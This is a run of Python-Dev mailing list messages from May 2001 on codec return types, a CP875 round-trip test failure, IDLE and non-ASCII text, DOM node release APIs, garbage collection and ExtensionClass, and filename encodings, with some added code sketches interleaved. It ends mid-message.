> > This is what's failing.
> 
> It strikes me that if someone executes
> 
> aString.decode("latin-1")
> 
> they're going to expect a unicode string.  AIUI, what's currently
> happening is that the string is converted from a latin-1 8-bit string
> to the 16-bit unicode string I expected and then there is an attempt
> to convert it back to an 8-bit string using the default encoding.  So
> if I'd done a
> 
> sys.setdefaultencoding("latin-1")
> 
> in my sitecustomize.py, then aString.decode("latin-1") would just be
> aString again?  This doesn't seem optimal.

True, and that's why I am proposing to loosen the restriction
that the two APIs return only strings.
 
> > Perhaps I should simply remove the restriction and have both APIs
> > return the codec's return object as-is ?! (I would be in favour of
> > this, but I'm not sure whether this is already in use by someone...)
> 
> Are all the codecs distributed with Python 2.1 unicode-related?  If
> that's the case, PyString_Decode isn't terribly useful is it?  It
> seems unlikely that it received much use.  Could be wrong of course.

All standard codecs in 2.0 and 2.1 are Unicode related. I am
planning to write up a bunch of string-to-string codecs next
week though which will then be the first non-Unicode related
codecs in 2.2.

> OTOH, maybe I'm trying to wedge too much behaviour onto a particular
> operation.  Do we want
> 
> open(file).read().decode("jpeg") -> some kind of PIL object
> 
> to be possible?

This would be possible indeed. Even though some may find this
coding style obscure, I think this technique has the same
usefulness as e.g. piping at OS level.

I am thinking of these use cases:

"???".decode("latin-1") -> Unicode (object construction)
"...jpeg data...".decode("jpeg") -> JpegImage object (ditto)
"???".decode("latin-1").encode("cp1521") -> string (recoding data)
"...long data...".encode("gzip") -> string (transfer encoding)
"...gzipped data...".decode("gzip") -> string (transfer decoding)
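Python 3 later split str and bytes, so bytes.decode() always yields text and the non-Unicode codecs are reached through codecs.encode() and codecs.decode(). A sketch of three of the use cases above under those rules; the zlib_codec codec stands in for the hypothetical "gzip" codec, and cp1252 is an arbitrary choice of target code page.

```python
import codecs

# Object construction: 8-bit data -> Unicode text
text = codecs.decode(b"caf\xe9", "latin-1")

# Recoding data: decode with one codec, encode with another
recoded = text.encode("cp1252")

# Transfer encoding and decoding with a bytes-to-bytes codec
payload = b"...long data..." * 50
packed = codecs.encode(payload, "zlib_codec")
unpacked = codecs.decode(packed, "zlib_codec")
```

The "decode to an arbitrary object" case (JPEG data to an image object) has no standard-library counterpart and is left out.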

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Sun May 13 19:20:01 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sun, 13 May 2001 19:20:01 +0200
Subject: [Python-Dev] Re: Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCOELPKBAA.tim_one@email.msn.com>
Message-ID: <3AFEC241.62084286@lemburg.com>

Tim Peters wrote:
> 
> I have a way to make dict lookup a teensy bit cheaper(*) that significantly
> reduces the number of collisions (which is much more valuable).
> 
> This caused a number of std tests to fail, because they were implicitly
> relying on the order in which a dict's entries are materialized via .keys()
> or .items().
> 
> Most of these were easy enough to fix.  The last failure remaining is
> test_unicode, and I don't know how to fix it.  It's dying here:
> 
>     try:
>         verify(unicode(s,encoding).encode(encoding) == s)
>     except TestFailed:
>         print '*** codec "%s" failed round-trip' % encoding
>     except ValueError,why:
>         print '*** codec for "%s" failed: %s' % (encoding, why)
> 
> when encoding == "cp875".  There's a bogus problem you have to worm around
> first:  test_unicode neglected to import TestFailed, so it actually dies
> with NameError while trying the "except TestFailed" clause after verify()
> raises TestFailed.  Once that's repaired, it's complaining about failing the
> round-trip encoding.

Ooops; this must have been caused by the assert statement
removal in the test suite I hacked up some months ago. Funny that
it never showed up... the code seems to be very robust ;-)
 
> The original character in s it's griping about is "?" (0x3f).  cp875.py has
> this entry in its decoding_map dict:
> 
>         0x003f: 0x001a, # SUBSTITUTE
> 
> But 0x1a is not a *unique* value in this dict.  There's also
> 
>         0x00dc: 0x001a, # SUBSTITUTE
>         0x00e1: 0x001a, # SUBSTITUTE
>         0x00ec: 0x001a, # SUBSTITUTE
>         0x00ed: 0x001a, # SUBSTITUTE
>         0x00fc: 0x001a, # SUBSTITUTE
>         0x00fd: 0x001a, # SUBSTITUTE
> 
> Therefore what appears associated with 0x1a in the derived encoding_map
> dict:
> 
> encoding_map = {}
> for k,v in decoding_map.items():
>     encoding_map[v] = k
> 
> may end up being any of the 7 decoding_map keys that map to 0x1a.  It just
> so happened to map back to 0x3f before, but to 0xfd after the dict change,
> so "?" doesn't survive the round trip anymore.

The "right" thing to do here, is to simply remove cp875
from the test for round-tripping. It is not the only encoding
which fails this test, but it's not our fault: the codecs were
all generated from the original codec maps at the Unicode.org site.

If their mappings are broken, we can't do much about it... other
than to ignore the error or remove the codec altogether.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Sun May 13 19:40:58 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sun, 13 May 2001 19:40:58 +0200
Subject: [Python-Dev] IDLE and non-ASCII characters
References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de>
Message-ID: <3AFEC72A.33076220@lemburg.com>

Martin von Loewis wrote:
> 
> Thanks to a bug report I got, I noticed for the first time that you
> cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell
> prompt, you may get
> 
> >>> s='äö'
> UnicodeError: ASCII encoding error: ordinal not in range(128)
> 
> Likewise, when trying to save a file that has non-ASCII characters,
> you get a traceback.
> 
> Now, I think I understand all the causes of the problem (Tkinter
> returning Unicode objects, and so on). However, I'm curious whether
> anybody has proposals on how to deal with it.
> 
> For saving text files, if Python had an encoding directive, things
> might be easier :-) For the shell prompt, I've no idea how to solve
> this best.
> 
> So any suggestions are welcome.

I have a bug report assigned to myself which indicates similar
problems with _tkinter and Tk/Tcl. There were other problem
reports on the German Python mailing list going in the same
direction too.

The basic problem seems to be that Tk/Tcl applies too much
magic to the text widget contents in order to find out the
used encoding and this can easily cause the whole encoding
mechanism to fail.

A Tk/Tcl expert should really look into this and fix _tkinter.c
to aid Tk/Tcl in not mixing up the encodings (e.g. it would
probably be a good idea to recode Python 8bit-strings into
whatever encoding Tk/Tcl assumes as default).
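For the save-file half of Martin's report, one possible approach, assuming a source-encoding declaration of the kind Python later adopted (PEP 263), is to write plain ASCII when possible and otherwise encode with an explicit codec and prepend a coding line. save_source and its fallback parameter are hypothetical names, not IDLE's actual API.

```python
def save_source(path: str, text: str, fallback: str = "utf-8") -> bytes:
    """Hypothetical IDLE-style save that falls back to an explicit encoding
    for non-ASCII text instead of raising."""
    try:
        data = text.encode("ascii")
    except UnicodeEncodeError:
        # Declare the encoding on line 1 so the interpreter decodes the file
        # the same way it was written.  (A real editor would also have to
        # respect an existing #! line or coding declaration.)
        header = "# -*- coding: %s -*-\n" % fallback
        data = (header + text).encode(fallback)
    with open(path, "wb") as f:
        f.write(data)
    return data
```

Pure-ASCII files are written unchanged, so only files that actually need a declaration get one.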

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From Mike.Olson at fourthought.com  Sun May 13 20:15:46 2001
From: Mike.Olson at fourthought.com (Mike Olson)
Date: Sun, 13 May 2001 12:15:46 -0600
Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT
References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de>
Message-ID: <3AFECF52.FF7E9B26@FourThought.com>

"Martin v. Loewis" wrote:
> 
> 
> In PyXML, I currently use
> 
> # Define ReleaseNode in a DOM-independent way
> import xml.dom.ext
> import xml.dom.minidom
> def _releasenode(n):
>     if isinstance(n, xml.dom.minidom.Node):
>         n.unlink()
>     else:
>         xml.dom.ext.ReleaseNode(n)
> 
> try:
>     from Ft.Lib import pDomlette
>     def ReleaseNode(n):
>         if isinstance(n, pDomlette.Node):
>             pDomlette.ReleaseNode(n)
>         else:
>             _releasenode(n)
>     _XsltElementBase = pDomlette.Element
> except ImportError:
>     ReleaseNode = _releasenode
>     from minisupport import _XsltElementBase
> 
> This code knows how to release minidom, 4DOM, and pDomlette nodes, and
> supports installations without 4Suite (i.e. without pDomlette). I've
> put this into xslt/__init__.py, so that all callers of
> Ft.Lib.pDomlette.ReleaseNode now need to call xml.xslt.ReleaseNode.
> If desired, I could produce a patch against the public Ft CVS.

What if we put these on the implementation, or else came up with a
standard interface on the node?  Then every DOM implementation that wants
to be compatible with XPath/XSLT would need to support this interface.


node.ownerDocument.implementation.releaseNode(node)

or

node.py_unlink()


> 
> As a slightly independent question, such a function also ought to
> support DOM implementations not known to it; I'm thinking in
> particular of the Zope DOMs. I'd like to hear proposals on how such an
> interface should work; I see three options:

See above

> 
> a) it is an operation on the document node (or any node), as in minidom.
> b) it is an operation on the DOM implementation (almost as in 4Suite;
>    you'd need to navigate from the node to the implementation, then
>    you'd need a well-known operation on the implementation)
> c) the code assumes that no release activity is necessary for unknown
>    DOMs, effectively believing in reference counting, garbage collection,
>    acquisition, and other black art.

I like either a or b
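Options (b), (a) and (c) can be combined into a single dispatch, tried in that order. A sketch, assuming the releaseNode method on the DOM implementation proposed above (it is not part of minidom or the W3C DOM); minidom documents fall through to their existing unlink(). release_node is a hypothetical name.

```python
import xml.dom.minidom


def release_node(node):
    """Hypothetical DOM-independent release; returns the strategy used."""
    owner = getattr(node, "ownerDocument", None)
    doc = owner if owner is not None else node   # a Document has no owner
    impl = getattr(doc, "implementation", None)
    release = getattr(impl, "releaseNode", None)  # option (b), proposed API
    if callable(release):
        release(node)
        return "implementation.releaseNode"
    unlink = getattr(node, "unlink", None)        # option (a), as in minidom
    if callable(unlink):
        unlink()
        return "unlink"
    return "no-op"                                # option (c): trust the GC


doc = xml.dom.minidom.parseString("<a><b/></a>")
print(release_node(doc))
```

Unknown DOMs that offer neither hook are simply left to reference counting and garbage collection.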

Mike

> 
> Any comments appreciated, in particular
> 1. from the Ft maintainers on introducing xml.xslt.ReleaseNode, and
> 2. from authors of other DOMs on a general memory management API for
>    Python DOM.
> 
> Regards,
> Martin
> 
> _______________________________________________
> 4suite mailing list
> 4suite at lists.fourthought.com
> http://lists.fourthought.com/mailman/listinfo/4suite

-- 
Mike Olson				 Principal Consultant
mike.olson at fourthought.com               (303)583-9900 x 102
Fourthought, Inc.                         http://Fourthought.com 
Software-engineering, knowledge-management, XML, CORBA, Linux, Python


From tim.one at home.com  Sun May 13 20:31:42 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 13 May 2001 14:31:42 -0400
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
In-Reply-To: <3AFEC241.62084286@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEOMKBAA.tim.one@home.com>

[M.-A. Lemburg]
> ...
> The "right" thing to do here, is to simply remove cp875
> from the test for round-tripping.

I'm relieved you think so, since that's what I already did <wink>.

> It is not the only encoding which fails this test, but it's not
> our fault: the codecs were all generated from the original codec
> maps at the Unicode.org site.
>
> If their mappings are broken, we can't do much about it... other
> than to ignore the error or remove the codec altogether.

On general principle I don't like either of those -- "in the face of
ambiguity, refuse the temptation to guess".  It's at least surprising to see

>>> unicode("?", "cp875").encode("cp875")
'\xfd'
>>>

now, yes?  Would it be better if an ambiguous encoding raised an exception in
"strict" mode?  That is, a third choice is to alert users when they're
relying on a broken part of a mapping.
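The third choice could look like this: when the encoding map is derived by inverting decoding_map, mark every Unicode value that several bytes decode to, and refuse to encode it in strict mode instead of silently keeping whichever byte the dict iteration order left there. AMBIGUOUS, build_encoding_map and encode_strict are hypothetical names; the real charmap codec machinery works differently.

```python
AMBIGUOUS = object()  # sentinel: several bytes decode to this character


def build_encoding_map(decoding_map):
    """Invert a byte -> Unicode-ordinal map, flagging non-unique targets."""
    encoding_map = {}
    for byte, char in decoding_map.items():
        # A second (or later) byte for the same character makes it ambiguous,
        # regardless of the order in which the dict yields its items.
        encoding_map[char] = AMBIGUOUS if char in encoding_map else byte
    return encoding_map


def encode_strict(text, encoding_map):
    out = bytearray()
    for ch in text:
        code = encoding_map.get(ord(ch))
        if code is None:
            raise UnicodeError("character %r has no mapping" % ch)
        if code is AMBIGUOUS:
            raise UnicodeError("character %r maps back to several bytes" % ch)
        out.append(code)
    return bytes(out)
```

Applied to the cp875 table, "?" would still decode to U+001A, but encoding U+001A would then raise instead of returning a byte that depends on dict order.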


From martin at loewis.home.cs.tu-berlin.de  Sun May 13 21:08:47 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 13 May 2001 21:08:47 +0200
Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT
In-Reply-To: <3AFECF52.FF7E9B26@FourThought.com> (message from Mike Olson on
	Sun, 13 May 2001 12:15:46 -0600)
References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com>
Message-ID: <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de>

> What if we put these on the implementation, or else came up with a
> standard interface on the node?  Then every DOM implementation that wants
> to be compatible with XPath/XSLT would need to support this interface.
> 
> 
> node.ownerDocument.implementation.releaseNode(node)
> 
> or
> 
> node.py_unlink()

releaseNode sounds good to me; it is unlikely that W3C would give an
operation that name but a different meaning. Any objections?

Regards,
Martin


From tim.one at home.com  Sun May 13 21:45:40 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 13 May 2001 15:45:40 -0400
Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames
In-Reply-To: <E14yqvu-0008Jb-00@usw-sf-web1.sourceforge.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEPAKBAA.tim.one@home.com>

> http://sourceforge.net/tracker/?func=detail&atid=305470&aid=410465&
>    group_id=5470
>
> Category: core (C code)
> Group: None
> >Status: Closed
> >Resolution: Accepted
> Priority: 5
> Submitted By: Mark Hammond (mhammond)
> Assigned to: Mark Hammond (mhammond)
> Summary: Allow pre-encoded strings as filenames
>
> Initial Comment:
> This patch enables most filename parameters to use pre-
> encoded strings.  On Windows, the default of "mbcs" is
> used.  On all other platforms, the default filename
> encoding is the same as the general default encoding,
> which in reality means there is no functional change.
> However, other platforms can simply plugin their own
> encodings.
> ...

Mark (or anyone else who understands all this), were doc changes included?
Can someone please add a briefer user-oriented blurb to Misc/NEWS too?


From tim.one at home.com  Sun May 13 22:54:50 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 13 May 2001 16:54:50 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <004001c0d919$a62de7d0$e46940d5@hagrid>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEPDKBAA.tim.one@home.com>

[/F]
> as a footnote, SRE uses the same source code to generate
> both 8-bit and 16-bit versions of the match engine.  I see no
> reason why we cannot do the same for the string operations
> (PyString, PyUnicode, and strop).
>
> if anyone wants me to look into this, just say "go ahead".

go ahead

Here's another idea:  whenever we fix or extend Python's "%" formats, it
requires changes in both stringobject.c and unicodeobject.c, but they've
diverged in irritating ways that make it a fresh adventure in each.

In the early days, Python handled % formats pretty much by just building a
format string and passing that on to C's sprintf.

But as the years have gone by, and the number of buggy platforms increased,
Python has taken over more & more of it itself.  For example, it doesn't
trust sprintf to deal with justification, 0-fill or blank-fill, and needed to
grow its own from-scratch code for integer conversion in order to handle
Python longs.  In addition, it also grew a PyErr_Format() routine as yet
another layer of simulating what a safe sprintf-alike should do.  Even with
all that, we've still got platform bugs due to, e.g., platform %#x and %#o
conversion adding base markers when "they shouldn't" (according to C), or not
adding them when "they should" (according to Python).
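The kind of from-scratch integer conversion described here fits in a few lines once C's sprintf is out of the picture. This hypothetical format_int follows Python 3's rules for the alternate form (0o/0x prefixes, including for zero, where C's %#x prints no prefix), which differ from 2001-era Python, where %#o produced a leading 0.

```python
DIGITS = "0123456789abcdef"
PREFIX = {8: "0o", 16: "0x"}


def format_int(value, base=10, alternate=False, width=0, zero_fill=False):
    """Hypothetical %d/%o/%x replacement that never calls the platform sprintf."""
    if base not in (8, 10, 16):
        raise ValueError("unsupported base: %r" % base)
    sign = "-" if value < 0 else ""
    n = -value if value < 0 else value  # Python ints are unbounded: no overflow
    digits = []
    while True:
        n, r = divmod(n, base)
        digits.append(DIGITS[r])
        if n == 0:
            break
    body = "".join(reversed(digits))
    head = sign + (PREFIX.get(base, "") if alternate else "")
    if zero_fill:
        # 0-fill goes between the sign/prefix and the digits.
        return head + body.rjust(width - len(head), "0")
    # Blank-fill right-justifies the whole field.
    return (head + body).rjust(width)
```

Because the same code handles small and arbitrarily large integers, Python longs need no separate path.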

All in all, the code would be simpler and quicker now if we left the platform
sprintf out of sprintf operations entirely <wink>.  The only thing we're not
simulating ourselves is float->string conversion.  Unfortunately, we can't do
that without also doing string->float, because platforms vary in the float
strings they can read back (e.g., if Python does float->string and produces
"Inf" for positive infinity, but uses strtod or atof to read floats back in,
it's a x-platform crapshoot whether "Inf" can be read back in).
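Handling both directions in one place is what makes the special values safe. A sketch with hypothetical float_to_str/str_to_float helpers that always emit and accept the same spellings, whatever the platform's printf and strtod would do. (CPython 3's own float() already accepts these spellings; the explicit table just makes the symmetry visible.)

```python
import math

_SPECIALS = {"nan": math.nan, "inf": math.inf, "+inf": math.inf, "-inf": -math.inf}


def float_to_str(x: float) -> str:
    # Fixed spellings for the special values instead of whatever the
    # platform's printf would produce.
    if math.isnan(x):
        return "nan"
    if math.isinf(x):
        return "inf" if x > 0 else "-inf"
    return repr(x)  # Python 3's repr of a float round-trips exactly


def str_to_float(s: str) -> float:
    # Accept exactly the special spellings float_to_str emits.
    key = s.strip().lower()
    if key in _SPECIALS:
        return _SPECIALS[key]
    return float(s)
```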

but-in-favor-of-merging-the-code-even-without-that-ly y'rs  - tim


From tim.one at home.com  Sun May 13 23:00:32 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 13 May 2001 17:00:32 -0400
Subject: [Python-Dev] test___all__ failing on Windows
In-Reply-To: <15098.42607.84670.323361@beluga.mojam.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEPDKBAA.tim.one@home.com>

[skip at pobox.com]
> I (thankfully) gave up even pretending to run Windows recently, so
> I can only make a suggestion for others who look into this problem.
> Try this:
> Change test___all__.check_all so that the except clause reads:
>
>     except ImportError, msg:
>
> then print out msg when an import fails.  You should get the actual
> module that failed to import.

Yes, that confirmed termios was the culprit.  Thanks!  Fixed by adding

import termios
del termios

in pty.py.  As the irritated comment before this new code says, this is
absurd.
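In Python 3 the same diagnosis comes almost for free: ImportError carries a name attribute (Python 3.3+) naming the module that actually failed, which may be a dependency such as termios rather than the module being checked. A simplified, hypothetical version of the check (not the real test___all__ code):

```python
import importlib


def check_all(modname):
    """Return None if modname imports and every name in its __all__ exists,
    otherwise a short description of the problem."""
    try:
        module = importlib.import_module(modname)
    except ImportError as exc:
        # exc.name is the module that really failed to import.
        return "import failed: %s: %s" % (exc.name or modname, exc)
    missing = [n for n in getattr(module, "__all__", ()) if not hasattr(module, n)]
    if missing:
        return "%s.__all__ lists missing names: %s" % (modname, missing)
    return None
```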

since-you're-on-a-roll-how-about-fixing-test_urllib2-too<wink>-ly
    y'rs  - tim


From guido at digicool.com  Mon May 14 00:26:39 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sun, 13 May 2001 17:26:39 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: Your message of "Sun, 13 May 2001 00:32:10 +0200."
             <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> 
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com>  
            <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> 
Message-ID: <200105132226.RAA21159@cj20424-a.reston1.va.home.com>

> > Now, if you are using the 1.4 version of ExtensionClasses you might
> > not have the tp_flags field either (I don't know, I can't easily
> > check) but the 1.5.2-compatible version of ExtensionClasses doesn't
> > even require recompilation to work with Python 2.1.
> 
> I'll attach a copy below of the struct as defined in
> pygtk-0.7.0-unstable-dont-use.tar.gz

Hmm...  I like that filename. :-)

> (0.6.6 does not use extension
> classes). As you can see, it does not provide tp_flags, but has a
> field of tp_xxx4 for it.

Sorry, that's what I meant.  This is guaranteed to be initialized to 0
(unless a module goes out of its way to put a value in it, in which
case they deserve what they get).

> That *should* work, except that it also has its 'methods' field where
> tp_traverse would go, and its class_flags field where tp_clear would
> go.
> 
> Now, you write
> 
> > ExtensionClasses (at least recent versions that worked with 1.5.2)
> > contain a copy of the type object up to and including the tp_flags
> > field, and the 2.1 code is careful not to use any newer fields
> > without first checking the corresponding flag bit.
> 
> In this generality, it is apparently not true: Modules/gcmodule.c has,
> in delete_garbage,
> 
> 			if ((clear = op->ob_type->tp_clear) != NULL) {
> ...
> 		traverse = PyObject_FROM_GC(gc)->ob_type->tp_traverse;
> 		(void) traverse(PyObject_FROM_GC(gc),
> 			       (visitproc)visit_decref,
> 			       NULL);
> 
> which does not check any flags. That still shouldn't cause any
> problems, since the Gtk objects should never end up in the GC lists -
> but may be I'm missing something.

I agree with your analysis: op here is gotten from a PyGC_Head, so it
cannot be a PyExtensionClass instance, so Neil's code should be safe.
Objects never have a GC head unless they specifically request it;
PyExtensionClass certainly doesn't request a GC head.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Mon May 14 00:37:44 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sun, 13 May 2001 17:37:44 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Sat, 12 May 2001 16:53:26 -0400."
             <Pine.NXT.4.21.0105121640050.261-100000@localhost> 
References: <Pine.NXT.4.21.0105121640050.261-100000@localhost> 
Message-ID: <200105132237.RAA21223@cj20424-a.reston1.va.home.com>

>  As I said earlier: the only advantage would be if it could simplify 
> things "under the hood" (compared to metaclasses) but could still 
> provide the same Class semantics (with maybe a "proto" declaration
> sneaking its nose in under the tent.)
>  But I have no immediate idea on how to do that, and it sounds like
> you're pretty far along into an implementation already. 

I don't know how to do it either, but I suspect it wouldn't be easy.

>  I guess my practical question, which I meant to ask before I got
> myself sidetracked into preaching prototypes is: How much of the
> existing plumbing (specifically the Don Beaudry hack) can I rely
> on in the future for the objective-C/python bridge ? 
>  With BOOST and Zope's extension classes relying on it, can I 
> assume that it's being extended rather than replaced ? 
> ( I guess I ought to take a look at the code! ) 

I'm currently not too concerned with backwards compatibility, and Jim
Fulton has proclaimed that he would prefer to get rid of
ExtensionClasses (since what I'm building goes way beyond them!), so
I'm not sure I can be motivated to support it just for BOOST's sake.
There will be a replacement mechanism that will be at least as
powerful, and I'm sure that BOOST etc. can be rewritten to use the new
mechanism easily.  That's what we're planning for Zope.

> Guido: did you ever imagine back at that first workshop at NIST
> that you and Python would be where you are today ? 

No way!  I knew I was on to something, but I had no idea onto what...
I'll always hold on to the T-shirt you made.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Mon May 14 00:43:57 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sun, 13 May 2001 17:43:57 -0500
Subject: [Python-Dev] status of pre?
In-Reply-To: Your message of "Sat, 12 May 2001 00:18:27 +0200."
             <00ca01c0da68$4fc66570$e46940d5@hagrid> 
References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> <200105111847.NAA05835@cj20424-a.reston1.va.home.com>  
            <00ca01c0da68$4fc66570$e46940d5@hagrid> 
Message-ID: <200105132243.RAA21290@cj20424-a.reston1.va.home.com>

> 2.2 is to be released in October, right?  I'm sure I could shake
> out the remaining bugs in my "stackless SRE" patch until then...

Knowing you that means you'd start working on them late September. :-)

There's actually a possibility that if my types/classes stuff goes
well, Digital Creations will ask for a 2.2 release sooner (e.g. July).
This might have an experimental status, e.g. it might not be backwards
compatible, but it would be the version required by Zope 2.4.  On the
other hand, none of that may happen, or that release would be labeled
2.2b1 or something, or Zope 2.4 might come out after October.

What I'm trying to say is, please try to fix stackless SRE sooner
rather than later!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Mon May 14 00:51:17 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sun, 13 May 2001 17:51:17 -0500
Subject: [Python-Dev] IDLE and non-ASCII characters
In-Reply-To: Your message of "Fri, 11 May 2001 22:53:55 +0200."
             <200105112053.WAA15657@pandora.informatik.hu-berlin.de> 
References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> 
Message-ID: <200105132251.RAA21344@cj20424-a.reston1.va.home.com>

> Thanks to a bug report I got, I noticed for the first time that you
> cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell
> prompt, you may get
> 
> >>> s='äö'
> UnicodeError: ASCII encoding error: ordinal not in range(128)

This doesn't bother me, because I don't know how to enter such
characters with my US keyboard anyway. :-) :-)

> Likewise, when trying to save a file that has non-ASCII characters,
> you get a traceback.

Yes, this has bitten me once.  It was very painful (I lost a few hours
worth of writing).

In other words, I agree it's a problem!

> Now, I think I understand all the causes of the problem (Tkinter
> returning Unicode objects, and so on). However, I'm curious whether
> anybody has proposals on how to deal with it.

Not me -- unfortunately, there are too many alternatives to IDLE to
be able to justify working on it much.

> For saving text files, if Python had an encoding directive, things
> might be easier :-) For the shell prompt, I've no idea how to solve
> this best.
> 
> So any suggestions are welcome.

Ditto.

Postscript: using cut and paste, I *can* enter "s='äö'" in IDLE at the
Python prompt, both on Linux and on Windows 98.  It prints as
'\xe4\xf6' on both systems.  What changed?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From Mike.Olson at fourthought.com  Mon May 14 03:02:03 2001
From: Mike.Olson at fourthought.com (Mike Olson)
Date: Sun, 13 May 2001 19:02:03 -0600
Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT
References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de>
Message-ID: <3AFF2E8B.31B9ED97@FourThought.com>

"Martin v. Loewis" wrote:
> 
> > What if we put these on the implementation, or else came up with a
> > standard interface on the node?  Then every DOM implementation that wants
> > to be compatible with XPath/XSLT would need to support this interface.
> >
> >
> > node.ownerDocument.implementation.releaseNode(node)
> >
> > or
> >
> > node.py_unlink()
> 
> releaseNode sounds good to me; it is unlikely that W3C would give an
> operation that name but a different meaning. Any objections?


Should we standardize all of the python xml extensions with a py
prefix?  pyReleaseNode or py_releaseNode?  Then we will never have to
worry about a name clash.

Mike
> 
> Regards,
> Martin

-- 
Mike Olson				 Principal Consultant
mike.olson at fourthought.com               (303)583-9900 x 102
Fourthought, Inc.                         http://Fourthought.com 
Software-engineering, knowledge-management, XML, CORBA, Linux, Python


From MarkH at ActiveState.com  Mon May 14 03:37:35 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Mon, 14 May 2001 11:37:35 +1000
Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEPAKBAA.tim.one@home.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIEKLDMAA.MarkH@ActiveState.com>

[Tim]
> Mark (or anyone else who understands all this), were doc changes included?
> Can someone please add a briefer user-oriented blurb to Misc/NEWS too?

No problem.

Where should the "real" documentation go?  It seems maybe we need a new
sub-heading under the "6.1 - os -- Misc. OS Interface" - something like:

6.1.x - Unicode and the file system
  - general discussion.
  - Windows specific
  - Mac specific should that appear.
  - OS' with no special support (ie, "the rest")

Does that make sense?

I have made this change to Misc/NEWS.  Does this look OK (obviously once I
know what to replace "[????]" with :)

And-I-will-do-the-registry-docs-at-the-same-time ly,

Mark.

Index: NEWS
===================================================================
RCS file: /cvsroot/python/python/dist/src/Misc/NEWS,v
retrieving revision 1.166
diff -r1.166 NEWS
4a5,21
> - Some operating systems now support the concept of a default Unicode
>   encoding for file system operations.  Notably, Windows supports 'mbcs'
>   as the default.  The Macintosh will also adopt this concept in the medium
>   term, although the default encoding for that platform will be other than
>   'mbcs'.
>   On operating systems that support non-ASCII filenames, it is common for
>   functions that return filenames (such as os.listdir()) to return Python
>   string objects pre-encoded using the default file system encoding for
>   the platform.  As this encoding is likely to be different from Python's
>   default encoding, converting this name to a Unicode object before passing
>   it back to the Operating System would result in a Unicode error, as Python
>   would attempt to use its default encoding (generally ASCII) rather
>   than the default encoding for the file system.
>   In general, this change simply removes surprises when working with
>   Unicode and the file system, making these operations work as
>   you expect, increasing the transparency of Unicode objects in this context.
>   See [????] for more details, including examples.
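For comparison, Python 3 eventually reached the same goal by a different route: os functions accept either str or bytes and return the type they were given, and os.fsencode()/os.fsdecode() convert using sys.getfilesystemencoding(). A small sketch (list_both_ways is a hypothetical helper) showing that a directory listed as text and as bytes yields the same names once the bytes are decoded:

```python
import os
import sys


def list_both_ways(directory: str):
    """Hypothetical helper: list a directory as text and as raw bytes."""
    as_text = sorted(os.listdir(directory))        # str in, str out
    as_bytes = os.listdir(os.fsencode(directory))  # bytes in, bytes out
    # Decode the raw names with the file system encoding.
    decoded = sorted(os.fsdecode(name) for name in as_bytes)
    return as_text, decoded


print("file system encoding:", sys.getfilesystemencoding())
```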


From tim.one at home.com  Mon May 14 04:52:22 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 13 May 2001 22:52:22 -0400
Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames
In-Reply-To: <LCEPIIGDJPKCOIHOBJEPIEKLDMAA.MarkH@ActiveState.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEPOKBAA.tim.one@home.com>

[Mark Hammond]
> ...
> Where should the "real" documentation go?  It seems maybe we need a
> new sub-heading under the "6.1 - os -- Misc. OS Interface" - something
> like:
>
